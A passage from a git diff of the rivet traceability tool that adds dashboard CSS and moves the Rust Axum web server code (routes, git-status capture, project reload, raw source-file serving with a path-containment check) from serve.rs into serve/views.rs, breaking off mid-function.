+.art-tooltip{position:absolute;z-index:1000;pointer-events:none; + background:var(--surface);border:1px solid var(--border);border-radius:var(--radius); + box-shadow:var(--shadow-lg);padding:0;max-width:340px;min-width:220px; + opacity:0;transition:opacity 120ms ease-in} +.art-tooltip.visible{opacity:1;pointer-events:auto} +.art-preview{padding:.75rem .85rem;font-size:.82rem;line-height:1.45} +.art-preview-header{display:flex;align-items:center;gap:.4rem;margin-bottom:.3rem} +.art-preview-title{font-weight:600;font-size:.85rem;margin-bottom:.3rem;color:var(--text)} +.art-preview-desc{color:var(--text-secondary);font-size:.78rem;line-height:1.4;margin-top:.3rem; + display:-webkit-box;-webkit-line-clamp:3;-webkit-box-orient:vertical;overflow:hidden} +.art-preview-links{font-size:.72rem;color:var(--text-secondary);margin-top:.35rem;font-family:var(--mono)} +.art-preview-tags{margin-top:.35rem;display:flex;flex-wrap:wrap;gap:.25rem} +.art-preview-tag{font-size:.65rem;padding:.1rem .35rem;border-radius:3px; + background:rgba(58,134,255,.08);color:var(--accent);font-family:var(--mono)} +.doc-glossary{font-size:.9rem} +.doc-glossary dt{font-weight:600;color:var(--text)} +.doc-glossary dd{margin:0 0 .5rem 1rem;color:var(--text-secondary)} +.doc-toc{font-size:.88rem;background:var(--surface);border:1px solid var(--border); + border-radius:var(--radius);padding:1rem 1.25rem;margin-bottom:1.25rem; + box-shadow:var(--shadow)} +.doc-toc strong{font-size:.75rem;text-transform:uppercase;letter-spacing:.05em;color:var(--text-secondary)} +.doc-toc ul{list-style:none;margin:.5rem 0 0;padding:0} +.doc-toc li{margin:.2rem 0;color:var(--text-secondary)} +.doc-toc .toc-h2{padding-left:0} +.doc-toc .toc-h3{padding-left:1.25rem} +.doc-toc .toc-h4{padding-left:2.5rem} +.doc-meta{display:flex;gap:.75rem;flex-wrap:wrap;align-items:center;margin-bottom:1.25rem} + +/* ── Source viewer ────────────────────────────────────────────── */ +.source-tree{font-family:var(--mono);font-size:.85rem;line-height:1.8} +.source-tree ul{list-style:none;margin:0;padding:0} +.source-tree li{margin:0} +.source-tree .tree-item{display:flex;align-items:center;gap:.4rem;padding:.2rem .5rem;border-radius:var(--radius-sm); + transition:background var(--transition);color:var(--text)} +.source-tree .tree-item:hover{background:rgba(58,134,255,.06);text-decoration:none} +.source-tree .tree-icon{display:inline-flex;width:1rem;height:1rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.55} +.source-tree .indent{display:inline-block;width:1.25rem;flex-shrink:0} +.source-viewer{font-family:var(--mono);font-size:.82rem;line-height:1.7;overflow-x:auto; + background:#fafbfc;border:1px solid var(--border);border-radius:var(--radius);padding:0} +.source-viewer table{width:100%;border-collapse:collapse;margin:0} +.source-viewer table td{padding:0;border:none;vertical-align:top} +.source-viewer table tr:hover{background:rgba(58,134,255,.04)} +.source-line{display:table-row} +.source-line .line-no{display:table-cell;width:3.5rem;min-width:3.5rem;padding:.05rem .75rem .05rem .5rem; + text-align:right;color:#b0b0b8;user-select:none;border-right:1px solid var(--border);background:#f5f5f7} +.source-line .line-content{display:table-cell;padding:.05rem .75rem;white-space:pre;tab-size:4} +.source-line-highlight{background:rgba(58,134,255,.08) !important} +.source-line-highlight .line-no{background:rgba(58,134,255,.12);color:var(--accent);font-weight:600} +.source-line:target{background:rgba(255,210,50,.18) !important} +.source-line:target .line-no{background:rgba(255,210,50,.25);color:#9a6700;font-weight:700} +.source-line .line-no a{color:inherit;text-decoration:none} +.source-line .line-no a:hover{color:var(--accent);text-decoration:underline} +/* ── Syntax highlighting tokens ─────────────────────────────── */ +.hl-key{color:#0550ae}.hl-str{color:#0a3069}.hl-num{color:#0550ae} +.hl-bool{color:#cf222e;font-weight:600}.hl-null{color:#cf222e;font-style:italic} +.hl-comment{color:#6e7781;font-style:italic}.hl-tag{color:#6639ba} +.hl-anchor{color:#953800}.hl-type{color:#8250df}.hl-kw{color:#cf222e;font-weight:600} +.hl-fn{color:#8250df}.hl-macro{color:#0550ae;font-weight:600} +.hl-attr{color:#116329}.hl-punct{color:#6e7781} +.hl-sh-cmd{color:#0550ae;font-weight:600}.hl-sh-flag{color:#953800} +.hl-sh-pipe{color:#cf222e;font-weight:700} +.source-ref-link{color:var(--accent);text-decoration:none;font-family:var(--mono);font-size:.85em} +.source-ref-link:hover{text-decoration:underline} +.source-breadcrumb{display:flex;align-items:center;gap:.4rem;font-size:.85rem;color:var(--text-secondary); + margin-bottom:1rem;flex-wrap:wrap} +.source-breadcrumb a{color:var(--accent);font-weight:500} +.source-breadcrumb .sep{opacity:.35;margin:0 .1rem} +.source-meta{display:flex;gap:1.5rem;font-size:.8rem;color:var(--text-secondary);margin-bottom:1rem} +.source-meta .meta-item{display:flex;align-items:center;gap:.35rem} +.source-refs{margin-top:1.25rem} +.source-refs h3{font-size:.95rem;margin-bottom:.5rem} + +/* ── STPA tree ───────────────────────────────────────────────── */ +.stpa-tree{margin-top:1.25rem} +.stpa-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} +.stpa-node{display:flex;align-items:center;gap:.5rem;padding:.35rem 0;font-size:.9rem} +.stpa-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} +.stpa-link-label{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; + font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; + margin-right:.35rem;white-space:nowrap} +details.stpa-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); + display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.9rem} +details.stpa-details>summary::-webkit-details-marker{display:none} +details.stpa-details>summary:hover{background:rgba(58,134,255,.04)} +details.stpa-details>summary .stpa-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} +details.stpa-details[open]>summary .stpa-chevron{transform:rotate(90deg)} +.stpa-uca-table{width:100%;border-collapse:collapse;font-size:.88rem;margin-top:.75rem} +.stpa-uca-table th{font-weight:600;font-size:.72rem;text-transform:uppercase;letter-spacing:.04em; + color:var(--text-secondary);padding:.5rem .75rem;border-bottom:2px solid var(--border)} +.stpa-uca-table td{padding:.55rem .75rem;border-bottom:1px solid var(--border);vertical-align:top} +.stpa-uca-table tbody tr:hover{background:rgba(58,134,255,.04)} +.uca-type-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600;white-space:nowrap} +.uca-type-not-providing{background:#fee;color:#c62828} +.uca-type-providing{background:#fff3e0;color:#e65100} +.uca-type-too-early-too-late{background:#e8f4fd;color:#0c5a82} +.uca-type-stopped-too-soon{background:#f3e5f5;color:#6a1b9a} + +/* ── Traceability explorer ──────────────────────────────────────── */ +.trace-matrix{border-collapse:collapse;font-size:.8rem;margin-bottom:1.5rem;width:100%} +.trace-matrix th{font-weight:600;font-size:.7rem;text-transform:uppercase;letter-spacing:.04em; + color:var(--text-secondary);padding:.45rem .6rem;border-bottom:2px solid var(--border);white-space:nowrap} +.trace-matrix td{padding:.35rem .6rem;border-bottom:1px solid var(--border);text-align:center} +.trace-matrix td:first-child{text-align:left;font-family:var(--mono);font-size:.78rem;font-weight:500} +.trace-matrix tbody tr:hover{background:rgba(58,134,255,.04)} +.trace-cell{display:inline-flex;align-items:center;justify-content:center;width:28px;height:22px; + border-radius:4px;font-size:.75rem;font-weight:700;font-variant-numeric:tabular-nums} +.trace-cell-ok{background:rgba(21,113,58,.1);color:#15713a} +.trace-cell-gap{background:rgba(198,40,40,.1);color:#c62828} +.trace-tree{margin-top:1rem} +.trace-node{display:flex;align-items:center;gap:.5rem;padding:.4rem .6rem;border-radius:var(--radius-sm); + transition:background var(--transition);font-size:.88rem} +.trace-node:hover{background:rgba(58,134,255,.04)} +.trace-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} +.trace-edge{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; + font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; + margin-right:.35rem;white-space:nowrap} +.trace-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} +details.trace-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); + display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.88rem} +details.trace-details>summary::-webkit-details-marker{display:none} +details.trace-details>summary:hover{background:rgba(58,134,255,.04)} +details.trace-details>summary .trace-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} +details.trace-details[open]>summary .trace-chevron{transform:rotate(90deg)} +.trace-history{margin:.35rem 0 .5rem 1.5rem;padding:.5rem .75rem;background:rgba(0,0,0,.015); + border-radius:var(--radius-sm);border:1px solid var(--border);font-size:.8rem} +.trace-history-title{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.04em; + color:var(--text-secondary);margin-bottom:.35rem} +.trace-history-item{display:flex;align-items:baseline;gap:.5rem;padding:.15rem 0;color:var(--text-secondary)} +.trace-history-item code{font-size:.75rem;color:var(--accent);font-weight:500} +.trace-history-item .hist-date{font-size:.72rem;color:var(--text-secondary);opacity:.7;min-width:70px} +.trace-history-item .hist-msg{font-size:.78rem;color:var(--text);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} +.trace-status{display:inline-flex;padding:.12rem .4rem;border-radius:4px;font-size:.68rem;font-weight:600; + margin-left:.25rem} +.trace-status-approved{background:rgba(21,113,58,.1);color:#15713a} +.trace-status-draft{background:rgba(184,134,11,.1);color:#b8860b} + +/* ── Artifact embedding in docs ────────────────────────────────── */ +.artifact-embed{margin:.75rem 0;padding:.75rem 1rem;background:var(--card-bg);border:1px solid var(--border); + border-radius:var(--radius);border-left:3px solid var(--accent)} +.artifact-embed-header{display:flex;align-items:center;gap:.5rem;margin-bottom:.35rem} +.artifact-embed-header .artifact-ref{font-family:var(--mono);font-size:.85rem;font-weight:600} +.artifact-embed-title{font-weight:600;font-size:.92rem;color:var(--text)} +.artifact-embed-desc{font-size:.82rem;color:var(--text-secondary);margin-top:.25rem;line-height:1.5} + +/* ── Diagram in artifact detail ────────────────────────────────── */ +.artifact-diagram{margin:1rem 0} +.artifact-diagram .mermaid{background:var(--card-bg);padding:1rem;border-radius:var(--radius); + border:1px solid var(--border)} + +/* ── AADL SVG style overrides (match etch) ────────────────────── */ +.aadl-viewport svg text{font-family:system-ui,-apple-system,BlinkMacSystemFont,sans-serif !important; + font-size:12px !important} +.aadl-viewport svg rect,.aadl-viewport svg polygon{rx:6;ry:6} +.aadl-viewport svg .node rect{stroke-width:1.5px;filter:drop-shadow(0 1px 3px rgba(0,0,0,.1))} +.aadl-viewport svg .edge path,.aadl-viewport svg .edge line{stroke:#888 !important;stroke-width:1.2px} +.aadl-viewport svg .edge polygon{fill:#888 !important;stroke:#888 !important} + +/* ── Scrollbar (subtle) ───────────────────────────────────────── */ +::-webkit-scrollbar{width:6px;height:6px} +::-webkit-scrollbar-track{background:transparent} +::-webkit-scrollbar-thumb{background:#c5c5cd;border-radius:3px} +::-webkit-scrollbar-thumb:hover{background:#a0a0aa} + +/* ── Selection ────────────────────────────────────────────────── */ +::selection{background:rgba(58,134,255,.18)} + +/* ── Cmd+K search modal ──────────────────────────────────────── */ +.cmd-k-overlay{position:fixed;inset:0;background:rgba(0,0,0,.55);backdrop-filter:blur(4px); + z-index:10000;display:none;align-items:flex-start;justify-content:center;padding-top:min(20vh,160px)} +.cmd-k-overlay.open{display:flex} +.cmd-k-modal{background:var(--sidebar);border-radius:12px;width:100%;max-width:600px; + box-shadow:0 16px 70px rgba(0,0,0,.35);border:1px solid rgba(255,255,255,.08); + overflow:hidden;display:flex;flex-direction:column;max-height:min(70vh,520px)} +.cmd-k-input{width:100%;padding:.875rem 1rem .875rem 2.75rem;font-size:1rem;font-family:var(--font); + background:transparent;border:none;border-bottom:1px solid rgba(255,255,255,.08); + color:#fff;outline:none;caret-color:var(--accent)} +.cmd-k-input::placeholder{color:rgba(255,255,255,.35)} +.cmd-k-icon{position:absolute;left:1rem;top:.95rem;color:rgba(255,255,255,.35);pointer-events:none; + font-size:.95rem} +.cmd-k-head{position:relative} +.cmd-k-results{overflow-y:auto;padding:.5rem 0;flex:1} +.cmd-k-empty{padding:1.5rem 1rem;text-align:center;color:rgba(255,255,255,.35);font-size:.9rem} +.cmd-k-group{padding:0 .5rem} +.cmd-k-group-label{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.06em; + color:rgba(255,255,255,.3);padding:.5rem .625rem .25rem} +.cmd-k-item{display:flex;align-items:center;gap:.75rem;padding:.5rem .625rem;border-radius:var(--radius-sm); + cursor:pointer;color:var(--sidebar-text);font-size:.88rem;transition:background 80ms ease} +.cmd-k-item:hover,.cmd-k-item.active{background:rgba(255,255,255,.08);color:#fff} +.cmd-k-item-icon{width:1.5rem;height:1.5rem;border-radius:4px;display:flex;align-items:center; + justify-content:center;font-size:.7rem;flex-shrink:0;background:rgba(255,255,255,.06);color:rgba(255,255,255,.5)} +.cmd-k-item-body{flex:1;min-width:0} +.cmd-k-item-title{font-weight:500;white-space:nowrap;overflow:hidden;text-overflow:ellipsis} +.cmd-k-item-title mark{background:transparent;color:var(--accent);font-weight:700} +.cmd-k-item-meta{font-size:.75rem;color:rgba(255,255,255,.35);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} +.cmd-k-item-meta mark{background:transparent;color:var(--accent);font-weight:600} +.cmd-k-item-field{font-size:.65rem;padding:.1rem .35rem;border-radius:3px; + background:rgba(255,255,255,.06);color:rgba(255,255,255,.4);white-space:nowrap;flex-shrink:0} +.cmd-k-kbd{display:inline-flex;align-items:center;gap:.2rem;font-size:.7rem;font-family:var(--mono); + padding:.15rem .4rem;border-radius:4px;background:rgba(255,255,255,.08);color:rgba(255,255,255,.4); + border:1px solid rgba(255,255,255,.06)} +.nav-search-hint{display:flex;align-items:center;justify-content:space-between;padding:.5rem .75rem; + margin-top:auto;border-top:1px solid rgba(255,255,255,.06);padding-top:1rem; + color:var(--sidebar-text);font-size:.82rem;cursor:pointer;border-radius:var(--radius-sm); + transition:all var(--transition)} +.nav-search-hint:hover{background:var(--sidebar-hover);color:var(--sidebar-active)} +.aadl-diagram{background:var(--card-bg);border:1px solid var(--border);border-radius:8px; + margin:1.5rem 0;overflow:hidden;position:relative} +.aadl-diagram .aadl-caption{display:flex;align-items:center;justify-content:space-between; + padding:.5rem 1rem;border-bottom:1px solid var(--border);background:var(--nav-bg); + font-size:.82rem;color:var(--text-secondary)} +.aadl-caption .aadl-title{font-weight:600;color:var(--text);font-family:var(--mono);font-size:.85rem} +.aadl-caption .aadl-badge{display:inline-block;padding:.1rem .5rem;border-radius:var(--radius-sm); + background:var(--primary);color:#fff;font-size:.72rem;font-weight:600;letter-spacing:.02em} +.aadl-controls{display:flex;gap:.25rem} +.aadl-controls button{background:var(--card-bg);border:1px solid var(--border);border-radius:var(--radius-sm); + width:1.7rem;height:1.7rem;cursor:pointer;font-size:.85rem;line-height:1;display:flex; + align-items:center;justify-content:center;color:var(--text-secondary);transition:all .15s} +.aadl-controls button:hover{background:var(--primary);color:#fff;border-color:var(--primary)} +.aadl-viewport{overflow:hidden;cursor:grab;min-height:300px;position:relative;background:var(--body-bg)} +.aadl-viewport.grabbing{cursor:grabbing} +.aadl-viewport svg{transform-origin:0 0;position:absolute;top:0;left:0} +.aadl-viewport svg .node rect,.aadl-viewport svg .node polygon,.aadl-viewport svg .node path,.aadl-viewport svg .node ellipse{filter:drop-shadow(0 1px 2px rgba(0,0,0,.08))} +.aadl-viewport svg .node text{font-family:system-ui,-apple-system,sans-serif} +.aadl-viewport svg .edge path{stroke-dasharray:none} +.aadl-loading{color:var(--text-secondary);font-style:italic;padding:2rem;text-align:center} +.aadl-error{color:var(--danger);font-style:italic;padding:1rem} +.aadl-analysis{border-top:1px solid var(--border);max-height:220px;overflow-y:auto;font-size:.78rem} +.aadl-analysis-header{display:flex;align-items:center;gap:.5rem;padding:.4rem 1rem; + background:var(--nav-bg);font-weight:600;font-size:.75rem;color:var(--text-secondary); + position:sticky;top:0;z-index:1;border-bottom:1px solid var(--border)} +.aadl-analysis-header .badge-count{display:inline-flex;align-items:center;justify-content:center; + min-width:1.3rem;height:1.3rem;border-radius:99px;font-size:.65rem;font-weight:700;padding:0 .3rem} +.badge-error{background:var(--danger);color:#fff} +.badge-warning{background:#e8a735;color:#fff} +.badge-info{background:var(--primary);color:#fff} +.aadl-diag{display:flex;align-items:baseline;gap:.5rem;padding:.3rem 1rem;border-bottom:1px solid var(--border)} +.aadl-diag:last-child{border-bottom:none} +.aadl-diag:hover{background:rgba(0,0,0,.03)} +.aadl-diag .sev{flex-shrink:0;font-size:.65rem;font-weight:700;text-transform:uppercase; + padding:.1rem .35rem;border-radius:var(--radius-sm);letter-spacing:.03em} +.sev-error{background:#fde8e8;color:var(--danger)} +.sev-warning{background:#fef3cd;color:#856404} +.sev-info{background:#d1ecf1;color:#0c5460} +.aadl-diag .diag-path{color:var(--text-secondary);font-family:var(--mono);font-size:.72rem;flex-shrink:0} +.aadl-diag .diag-msg{color:var(--text);flex:1} +.aadl-diag .diag-analysis{color:var(--text-secondary);font-size:.68rem;opacity:.7;flex-shrink:0} +"#; diff --git a/rivet-cli/src/serve.rs b/rivet-cli/src/serve/views.rs similarity index 57% rename from rivet-cli/src/serve.rs rename to rivet-cli/src/serve/views.rs index 27a9ff7..d5f7462 100644 --- a/rivet-cli/src/serve.rs +++ b/rivet-cli/src/serve/views.rs @@ -1,2508 +1,42 @@ use std::collections::{BTreeMap, HashMap}; -use std::path::PathBuf; -use std::sync::Arc; -use anyhow::{Context as _, Result}; -use axum::Router; use axum::extract::{Path, Query, State}; -use axum::response::{Html, IntoResponse}; -use axum::routing::{get, post}; +use axum::response::Html; use petgraph::graph::{Graph, NodeIndex}; use petgraph::visit::EdgeRef; -use tokio::sync::RwLock; - -/// Embedded WASM/JS assets for single-binary distribution. -/// Only available when built with `--features embed-wasm` and assets exist. -#[cfg(feature = "embed-wasm")] -mod embedded_wasm { - pub const SPAR_JS: &str = include_str!("../assets/wasm/js/spar_wasm.js"); - pub const CORE_WASM: &[u8] = include_bytes!("../assets/wasm/js/spar_wasm.core.wasm"); - pub const CORE2_WASM: &[u8] = include_bytes!("../assets/wasm/js/spar_wasm.core2.wasm"); - pub const CORE3_WASM: &[u8] = include_bytes!("../assets/wasm/js/spar_wasm.core3.wasm"); -} - -use crate::{docs, schema_cmd}; -use etch::filter::ego_subgraph; -use etch::layout::{self as pgv_layout, EdgeInfo, LayoutOptions, NodeInfo}; -use etch::svg::{SvgOptions, render_svg}; -use rivet_core::adapter::{Adapter, AdapterConfig, AdapterSource}; -use rivet_core::coverage; -use rivet_core::diff::ArtifactDiff; -use rivet_core::document::{self, DocumentStore}; -use rivet_core::formats::generic::GenericYamlAdapter; -use rivet_core::links::LinkGraph; -use rivet_core::matrix::{self, Direction}; -use rivet_core::model::ProjectConfig; -use rivet_core::results::ResultStore; -use rivet_core::schema::{Schema, Severity}; -use rivet_core::store::Store; -use rivet_core::validate; - -// ── Repository context ────────────────────────────────────────────────── - -/// Git repository status captured at load time. -struct GitInfo { - branch: String, - commit_short: String, - is_dirty: bool, - dirty_count: usize, -} - -/// A discovered sibling project (example or peer). -struct SiblingProject { - name: String, - rel_path: String, -} - -/// Project context shown in the dashboard header. -struct RepoContext { - project_name: String, - project_path: String, - git: Option, - loaded_at: String, - siblings: Vec, - port: u16, -} - -fn capture_git_info(project_path: &std::path::Path) -> Option { - let branch = std::process::Command::new("git") - .args(["rev-parse", "--abbrev-ref", "HEAD"]) - .current_dir(project_path) - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string())?; - - let commit_short = std::process::Command::new("git") - .args(["rev-parse", "--short", "HEAD"]) - .current_dir(project_path) - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) - .unwrap_or_default(); - - let porcelain = std::process::Command::new("git") - .args(["status", "--porcelain"]) - .current_dir(project_path) - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).to_string()) - .unwrap_or_default(); - - let dirty_count = porcelain.lines().filter(|l| !l.is_empty()).count(); - - Some(GitInfo { - branch, - commit_short, - is_dirty: dirty_count > 0, - dirty_count, - }) -} - -/// Discover other rivet projects (examples/ and peer directories). -fn discover_siblings(project_path: &std::path::Path) -> Vec { - let mut siblings = Vec::new(); - - // Check examples/ subdirectory - let examples_dir = project_path.join("examples"); - if examples_dir.is_dir() { - if let Ok(entries) = std::fs::read_dir(&examples_dir) { - for entry in entries.flatten() { - let p = entry.path(); - if p.join("rivet.yaml").exists() { - if let Some(name) = p.file_name().and_then(|n| n.to_str()) { - siblings.push(SiblingProject { - name: name.to_string(), - rel_path: format!("examples/{name}"), - }); - } - } - } - } - } - - // If inside examples/, offer root project and peers - if let Some(parent) = project_path.parent() { - if parent.file_name().and_then(|n| n.to_str()) == Some("examples") { - if let Some(root) = parent.parent() { - if root.join("rivet.yaml").exists() { - if let Ok(cfg) = std::fs::read_to_string(root.join("rivet.yaml")) { - let root_name = cfg - .lines() - .find(|l| l.trim().starts_with("name:")) - .map(|l| l.trim().trim_start_matches("name:").trim().to_string()) - .unwrap_or_else(|| { - root.file_name() - .and_then(|n| n.to_str()) - .unwrap_or("root") - .to_string() - }); - siblings.push(SiblingProject { - name: root_name, - rel_path: root.display().to_string(), - }); - } - } - // Peer examples - if let Ok(entries) = std::fs::read_dir(parent) { - for entry in entries.flatten() { - let p = entry.path(); - if p != project_path && p.join("rivet.yaml").exists() { - if let Some(name) = p.file_name().and_then(|n| n.to_str()) { - siblings.push(SiblingProject { - name: name.to_string(), - rel_path: p.display().to_string(), - }); - } - } - } - } - } - } - } - - siblings.sort_by(|a, b| a.name.cmp(&b.name)); - siblings -} - -/// Shared application state loaded once at startup. -struct AppState { - store: Store, - schema: Schema, - graph: LinkGraph, - doc_store: DocumentStore, - result_store: ResultStore, - context: RepoContext, - /// Canonical path to the project directory (for reload). - project_path_buf: PathBuf, - /// Path to the schemas directory (for reload). - schemas_dir: PathBuf, - /// Resolved docs directories (for serving images/assets). - doc_dirs: Vec, -} - -/// Convenience alias so handler signatures stay compact. -type SharedState = Arc>; - -/// Build a fresh `AppState` by loading everything from disk. -fn reload_state( - project_path: &std::path::Path, - schemas_dir: &std::path::Path, - port: u16, -) -> Result { - let config_path = project_path.join("rivet.yaml"); - let config = rivet_core::load_project_config(&config_path) - .with_context(|| format!("loading {}", config_path.display()))?; - - let schema = rivet_core::load_schemas(&config.project.schemas, schemas_dir) - .context("loading schemas")?; - - let mut store = Store::new(); - for source in &config.sources { - let artifacts = rivet_core::load_artifacts(source, project_path) - .with_context(|| format!("loading source '{}'", source.path))?; - for artifact in artifacts { - store.upsert(artifact); - } - } - - let graph = LinkGraph::build(&store, &schema); - - let mut doc_store = DocumentStore::new(); - let mut doc_dirs = Vec::new(); - for docs_path in &config.docs { - let dir = project_path.join(docs_path); - if dir.is_dir() { - doc_dirs.push(dir.clone()); - } - let docs = rivet_core::document::load_documents(&dir) - .with_context(|| format!("loading docs from '{docs_path}'"))?; - for doc in docs { - doc_store.insert(doc); - } - } - - let mut result_store = ResultStore::new(); - if let Some(ref results_path) = config.results { - let dir = project_path.join(results_path); - let runs = rivet_core::results::load_results(&dir) - .with_context(|| format!("loading results from '{results_path}'"))?; - for run in runs { - result_store.insert(run); - } - } - - let git = capture_git_info(project_path); - let loaded_at = std::process::Command::new("date") - .arg("+%H:%M:%S") - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) - .unwrap_or_else(|| "unknown".into()); - let siblings = discover_siblings(project_path); - let project_name = config.project.name.clone(); - - let context = RepoContext { - project_name, - project_path: project_path.display().to_string(), - git, - loaded_at, - siblings, - port, - }; - - Ok(AppState { - store, - schema, - graph, - doc_store, - result_store, - context, - project_path_buf: project_path.to_path_buf(), - schemas_dir: schemas_dir.to_path_buf(), - doc_dirs, - }) -} - -/// Start the axum HTTP server on the given port. -#[allow(clippy::too_many_arguments)] -pub async fn run( - store: Store, - schema: Schema, - graph: LinkGraph, - doc_store: DocumentStore, - result_store: ResultStore, - project_name: String, - project_path: PathBuf, - schemas_dir: PathBuf, - doc_dirs: Vec, - port: u16, -) -> Result<()> { - let git = capture_git_info(&project_path); - let loaded_at = std::process::Command::new("date") - .arg("+%H:%M:%S") - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) - .unwrap_or_else(|| "unknown".into()); - let siblings = discover_siblings(&project_path); - let context = RepoContext { - project_name, - project_path: project_path.display().to_string(), - git, - loaded_at, - siblings, - port, - }; - - let state: SharedState = Arc::new(RwLock::new(AppState { - store, - schema, - graph, - doc_store, - result_store, - context, - project_path_buf: project_path, - schemas_dir, - doc_dirs, - })); - - let app = Router::new() - .route("/", get(index)) - .route("/artifacts", get(artifacts_list)) - .route("/artifacts/{id}", get(artifact_detail)) - .route("/artifacts/{id}/preview", get(artifact_preview)) - .route("/artifacts/{id}/graph", get(artifact_graph)) - .route("/validate", get(validate_view)) - .route("/matrix", get(matrix_view)) - .route("/graph", get(graph_view)) - .route("/stats", get(stats_view)) - .route("/coverage", get(coverage_view)) - .route("/documents", get(documents_list)) - .route("/documents/{id}", get(document_detail)) - .route("/search", get(search_view)) - .route("/verification", get(verification_view)) - .route("/stpa", get(stpa_view)) - .route("/results", get(results_view)) - .route("/results/{run_id}", get(result_detail)) - .route("/source", get(source_tree_view)) - .route("/source/{*path}", get(source_file_view)) - .route("/source-raw/{*path}", get(source_raw)) - .route("/diff", get(diff_view)) - .route("/doc-linkage", get(doc_linkage_view)) - .route("/traceability", get(traceability_view)) - .route("/traceability/history", get(traceability_history)) - .route("/api/links/{id}", get(api_artifact_links)) - .route("/wasm/{*path}", get(wasm_asset)) - .route("/help", get(help_view)) - .route("/help/docs", get(help_docs_list)) - .route("/help/docs/{*slug}", get(help_docs_topic)) - .route("/help/schema", get(help_schema_list)) - .route("/help/schema/{name}", get(help_schema_show)) - .route("/help/links", get(help_links_view)) - .route("/help/rules", get(help_rules_view)) - .route("/docs-asset/{*path}", get(docs_asset)) - .route("/reload", post(reload_handler)) - .with_state(state.clone()) - .layer(axum::middleware::from_fn_with_state(state, wrap_full_page)); - - let addr = format!("0.0.0.0:{port}"); - eprintln!("rivet dashboard listening on http://localhost:{port}"); - - let listener = tokio::net::TcpListener::bind(&addr).await?; - axum::serve(listener, app).await?; - Ok(()) -} - -/// Middleware: for direct browser requests (no HX-Request header) to view routes, -/// wrap the handler's partial HTML in the full page layout. This replaces the old -/// `/?goto=` redirect pattern and fixes query-param loss, hash-fragment loss, and -/// the async replaceState race condition. -async fn wrap_full_page( - State(state): State, - req: axum::extract::Request, - next: axum::middleware::Next, -) -> axum::response::Response { - let path = req.uri().path().to_string(); - let is_htmx = req.headers().contains_key("hx-request"); - let method = req.method().clone(); - - let response = next.run(req).await; - - // Only wrap GET requests to view routes (not /, assets, or APIs) - if method == axum::http::Method::GET - && !is_htmx - && path != "/" - && !path.starts_with("/api/") - && !path.starts_with("/wasm/") - && !path.starts_with("/source-raw/") - && !path.starts_with("/docs-asset/") - { - let bytes = axum::body::to_bytes(response.into_body(), 16 * 1024 * 1024) - .await - .unwrap_or_default(); - let content = String::from_utf8_lossy(&bytes); - let app = state.read().await; - return page_layout(&content, &app).into_response(); - } - - response -} - -/// GET /api/links/{id} — return JSON array of AADL-prefixed artifact IDs linked -/// to the given artifact (forward links, backlinks, and self if applicable). -async fn api_artifact_links( - State(state): State, - Path(id): Path, -) -> axum::Json> { - let state = state.read().await; - let graph = &state.graph; - - let mut linked_ids = Vec::new(); - - // Forward links from this artifact - for link in graph.links_from(&id) { - if link.target.starts_with("AADL-") { - linked_ids.push(link.target.clone()); - } - } - - // Backlinks to this artifact - for bl in graph.backlinks_to(&id) { - if bl.source.starts_with("AADL-") { - linked_ids.push(bl.source.clone()); - } - } - - // If this IS an AADL artifact, include self - if id.starts_with("AADL-") { - linked_ids.push(id); - } - - axum::Json(linked_ids) -} - -/// GET /source-raw/{*path} — serve a project file as raw text (for WASM client-side rendering). -async fn source_raw( - State(state): State, - Path(raw_path): Path, -) -> impl IntoResponse { - let state = state.read().await; - let project_path = &state.project_path_buf; - let decoded = urlencoding::decode(&raw_path).unwrap_or(std::borrow::Cow::Borrowed(&raw_path)); - let rel_path = decoded.as_ref(); - - let full_path = project_path.join(rel_path); - let canonical = match full_path.canonicalize() { - Ok(p) => p, - Err(_) => { - return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(); - } - }; - let canonical_project = match project_path.canonicalize() { - Ok(p) => p, - Err(_) => { - return (axum::http::StatusCode::INTERNAL_SERVER_ERROR, "error").into_response(); - } - }; - if !canonical.starts_with(&canonical_project) { - return (axum::http::StatusCode::FORBIDDEN, "forbidden").into_response(); - } - - let metadata = match std::fs::symlink_metadata(&full_path) { - Ok(m) => m, - Err(_) => return (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), - }; - - // Directory: return JSON listing of filenames. - if metadata.is_dir() { - let mut entries = Vec::new(); - if let Ok(dir) = std::fs::read_dir(&full_path) { - for entry in dir.flatten() { - if let Some(name) = entry.file_name().to_str() { - entries.push(name.to_string()); - } - } - } - entries.sort(); - let json = serde_json::to_string(&entries).unwrap_or_else(|_| "[]".into()); - return ( - axum::http::StatusCode::OK, - [(axum::http::header::CONTENT_TYPE, "application/json")], - json, - ) - .into_response(); - } - - match std::fs::read_to_string(&full_path) { - Ok(content) => ( - axum::http::StatusCode::OK, 